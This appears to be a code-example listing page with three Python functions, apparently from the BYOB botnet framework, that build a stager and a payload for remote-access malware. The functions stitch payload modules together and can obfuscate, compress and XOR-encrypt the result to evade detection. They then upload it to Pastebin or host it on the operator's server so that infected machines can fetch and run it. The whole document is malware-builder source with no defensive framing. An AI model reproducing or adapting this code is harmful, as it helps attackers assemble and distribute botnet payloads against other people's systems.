Пример #1
0
def _stager(options, **kwargs):
    util.display("\n[>]", color='green', style='bright', end=',')
    util.display("Stager", color='reset', style='bright')

    assert 'url' in kwargs, "missing keyword argument 'url'"
    assert 'key' in kwargs, "missing keyword argument 'key'"
    assert 'var' in kwargs, "missing keyword argument 'var'"

    if options.encrypt:
        stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'], key=kwargs['key'])
    else:
        stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])

    if not os.path.isdir('modules/stagers'):
        try:
            os.mkdir('modules/stagers')
        except OSError:
            util.log("Permission denied: unable to make directory './modules/stagers/'")

    if options.compress:
        util.display("\tCompressing stager... ", color='reset', style='normal', end=',')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(stager)
        __load__.set()
        _update(stager, output, task='Compression')
        stager = output

    util.display("\tUploading stager... ", color='reset', style='normal', end=',')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(stager, options.pastebin)
    else:
        dirs = ['modules/stagers','byob/modules/stagers','byob/byob/modules/stagers']
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py' )

        with open(path, 'w') as fp:
            fp.write(stager)

        s = 'http://{}:{}/{}'.format(options.host, int(options.port) + 1, urllib.pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'), '')))
        s = urllib2.urlparse.urlsplit(s)
        url = urllib2.urlparse.urlunsplit((s.scheme, s.netloc, os.path.normpath(s.path), s.query, s.fragment)).replace('\\','/')

    __load__.set()
    util.display("(hosting stager at: {})".format(url), color='reset', style='dim')
    return url
Пример #2
0
def _payload(options, **kwargs):
    util.display("\n[>]", color='green', style='bright', end=' ')
    util.display("Payload", color='reset', style='bright')

    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"

    #    loader  = '\n'.join((open('core/loader.py','r').read(), generators.loader(host=options.host, port=int(options.port)+2, packages=list(kwargs['hidden']))))
    loader = open('core/loader.py', 'r').read()
    test_imports = '\n'.join([
        'import ' + i for i in list(kwargs['hidden'])
        if i not in ['StringIO', '_winreg']
    ])
    modules = '\n'.join(([
        open(module, 'r').read().partition('# main')[2]
        for module in kwargs['modules']
    ] + [
        generators.main(
            'Payload', **{
                "host": options.host,
                "port": options.port,
                "pastebin": options.pastebin if options.pastebin else str()
            }) + '_payload.run()'
    ]))
    payload = '\n'.join((loader, test_imports, modules))

    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            util.log(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.compress:
        util.display("\tCompressing payload... ",
                     color='reset',
                     style='normal',
                     end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        util.display("\tEncrypting payload... ".format(kwargs['key']),
                     color='reset',
                     style='normal',
                     end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    util.display("\tUploading payload... ",
                 color='reset',
                 style='normal',
                 end=' ')

    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, options.pastebin)
    else:
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(payload)

        s = 'http://{}:{}/{}'.format(
            options.host,
            int(options.port) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    __load__.set()
    util.display("(hosting payload at: {})".format(url),
                 color='reset',
                 style='dim')
    return url
Пример #3
0
def _payload(options, **kwargs):
    util.display("\n[>]", color='green', style='bright', end=',')
    util.display("Payload", color='reset', style='bright')
    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"
    payload = '\n'.join(
        list(kwargs['imports']) + [
            open(module, 'r').read().partition('# main')[2]
            for module in kwargs['modules']
        ]) + generators.main(
            'Payload', **{
                "host": options.host,
                "port": options.port,
                "pastebin": options.pastebin if options.pastebin else str()
            }) + '_payload.run()'
    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            __logger__.debug(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.obfuscate:
        __load__ = threading.Event()
        util.display("\tObfuscating payload... ",
                     color='reset',
                     style='normal',
                     end=',')
        __spin__ = _spinner(__load__)
        output = '\n'.join([
            line
            for line in generators.obfuscate(payload).rstrip().splitlines()
            if '=jobs' not in line
        ])
        __load__.set()
        _update(payload, output, task='Obfuscation')
        payload = output

    if options.compress:
        util.display("\tCompressing payload... ",
                     color='reset',
                     style='normal',
                     end=',')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        util.display("\tEncrypting payload... ".format(kwargs['key']),
                     color='reset',
                     style='normal',
                     end=',')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.encrypt(payload, kwargs['key'])
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    util.display("\tUploading payload... ",
                 color='reset',
                 style='normal',
                 end=',')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, api_dev_key=options.pastebin)
    else:
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d
        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')
        with file(path, 'w') as fp:
            fp.write(payload)
        s = 'http://{}:{}/{}'.format(
            options.host,
            int(options.port) + 1,
            urllib.pathname2url(
                path.replace(os.path.join(os.getcwd(), 'modules'), '')))
        s = urllib2.urlparse.urlsplit(s)
        url = urllib2.urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')
    __load__.set()
    util.display("(hosting payload at: {})".format(url),
                 color='reset',
                 style='dim')
    return url